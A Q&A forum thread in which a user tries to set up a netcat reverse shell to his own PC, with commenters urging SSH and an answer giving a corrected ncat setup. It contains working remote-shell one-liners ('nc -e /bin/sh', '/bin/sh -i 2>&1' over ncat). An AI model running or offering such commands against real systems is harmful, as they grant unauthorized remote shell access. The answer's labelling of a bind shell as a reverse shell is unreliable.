0

Okay, so I am working on a Reverse Shell for my computer so if anything were to happen, I could get back in and fix it. I used the command nc -nvlp 1234 on the PC, and on the other one, I run nc -e /bin/sh <ip> 1234 using this, I can connect to the computer and use the shell remotely. For some reason, I can't see replies from the shell unless the connection is closed by the host. How can I make this show live replies from the shell. E.X. 

~$ nc -e /bin/sh <ip> 1234
help
GNU bash, version 4.4.23(1)-release (x86_64-pc-linux-gnu)
These shell commands are defined internally.  Type `help' to see this list.
Type `help name' to find out more about the function `name'.
Use `info bash' to find out more about the shell in general.
Use `man -k' or `info' to find out more about commands not in this list.

A star (*) next to a name means that the command is disabled.

 job_spec [&]                                                history [-c] [-d offset] [n] or history -anrw [filename]>
 (( expression ))                                            if COMMANDS; then COMMANDS; [ elif COMMANDS; then COMMAN>
 . filename [arguments]                                      jobs [-lnprs] [jobspec ...] or jobs -x command [args]
 :                                                           kill [-s sigspec | -n signum | -sigspec] pid | jobspec .>
 [ arg... ]                                                  let arg [arg ...]
 [[ expression ]]                                            local [option] name[=value] ...
 alias [-p] [name[=value] ... ]                              logout [n]
 bg [job_spec ...]                                           mapfile [-d delim] [-n count] [-O origin] [-s count] [-t>
 bind [-lpsvPSVX] [-m keymap] [-f filename] [-q name] [-u >  popd [-n] [+N | -N]
 break [n]                                                   printf [-v var] format [arguments]
 builtin [shell-builtin [arg ...]]                           pushd [-n] [+N | -N | dir]
 caller [expr]                                               pwd [-LP]
 case WORD in [PATTERN [| PATTERN]...) COMMANDS ;;]... esa>  read [-ers] [-a array] [-d delim] [-i text] [-n nchars] >
 cd [-L|[-P [-e]] [-@]] [dir]                                readarray [-n count] [-O origin] [-s count] [-t] [-u fd]>
 command [-pVv] command [arg ...]                            readonly [-aAf] [name[=value] ...] or readonly -p
 compgen [-abcdefgjksuv] [-o option] [-A action] [-G globp>  return [n]
 complete [-abcdefgjksuv] [-pr] [-DE] [-o option] [-A acti>  select NAME [in WORDS ... ;] do COMMANDS; done
 compopt [-o|+o option] [-DE] [name ...]                     set [-abefhkmnptuvxBCHP] [-o option-name] [--] [arg ...]
 continue [n]                                                shift [n]
 coproc [NAME] command [redirections]                        shopt [-pqsu] [-o] [optname ...]
 declare [-aAfFgilnrtux] [-p] [name[=value] ...]             source filename [arguments]
 dirs [-clpv] [+N] [-N]                                      suspend [-f]
 disown [-h] [-ar] [jobspec ... | pid ...]                   test [expr]
 echo [-neE] [arg ...]                                       time [-p] pipeline
 enable [-a] [-dnps] [-f filename] [name ...]                times
 eval [arg ...]                                              trap [-lp] [[arg] signal_spec ...]
 exec [-cl] [-a name] [command [arguments ...]] [redirecti>  true
 exit [n]                                                    type [-afptP] name [name ...]
 export [-fn] [name[=value] ...] or export -p                typeset [-aAfFgilnrtux] [-p] name[=value] ...
 false                                                       ulimit [-SHabcdefiklmnpqrstuvxPT] [limit]
 fc [-e ename] [-lnr] [first] [last] or fc -s [pat=rep] [c>  umask [-p] [-S] [mode]
 fg [job_spec]                                               unalias [-a] name [name ...]
 for NAME [in WORDS ... ] ; do COMMANDS; done                unset [-f] [-v] [-n] [name ...]
 for (( exp1; exp2; exp3 )); do COMMANDS; done               until COMMANDS; do COMMANDS; done
 function name { COMMANDS ; } or name () { COMMANDS ; }      variables - Names and meanings of some shell variables
 getopts optstring name [arg]                                wait [-n] [id ...]
 hash [-lr] [-p pathname] [-dt] [name ...]                   while COMMANDS; do COMMANDS; done
 help [-dms] [pattern ...]

Instead of doing that, the shell won't show it unless the host shuts down the connection while I am still connected.

Derek Haber
  • 137
  • 1
  • 3
  • 12
  • This sounds quite dangerous from a security perspective. Why not connect with SSH instead? – ewramner Mar 12 '19 at 16:50
  • Note that /bin/sh sends prompts to stderr, so you should be doing something like `nc -c '/bin/sh -i 2>&1' IP 1234`. You do realise that the commands are supposed to be typed into the listening nc, not the one running `sh`? As commented above, unencrypted connections are really dangerous. – jhnc Mar 13 '19 at 00:33
  • @ewramner Because that would be brute forced too easy, as netcot results wont appear via nmap scan, jww I will move there, my apologies, and jhnc I got the same problem with that. – Derek Haber Mar 13 '19 at 14:23
  • Security through obscurity is seldom good. You will still be found by a scan, it just has to be a bit more advanced and when they find you they are in. Brute-forcing SSH with public key authentication rather than passwords is not easy. If you like you can use another port than 22 to avoid the really simple scans, but again that won't protect you much. Still, your decision - good luck! – ewramner Mar 13 '19 at 15:14
  • @ewramner This is for study purposes, I want to do my own research on how the security benefits and downfalls from my decision. I need to figure out how I can do this, so I can continue my studies. – Derek Haber Mar 15 '19 at 12:58

1 Answers1

0

The problem is that your shell command is being executed on the wrong end. If you want to establish a remote shell, it should be the server creating the shell, not the client. The output you see is actually not coming from the server you connected to, but rather the shell where you ran the client command.

Here is a proper way to establish a reverse shell using ncat:

Server:

ncat -nvlp 1234 -c 'exec /bin/sh -i 2>&1'

Client:

ncat localhost 1234

This setup ensures that when the client connects, the server drops it into a shell

smac89
  • 39,374
  • 15
  • 132
  • 179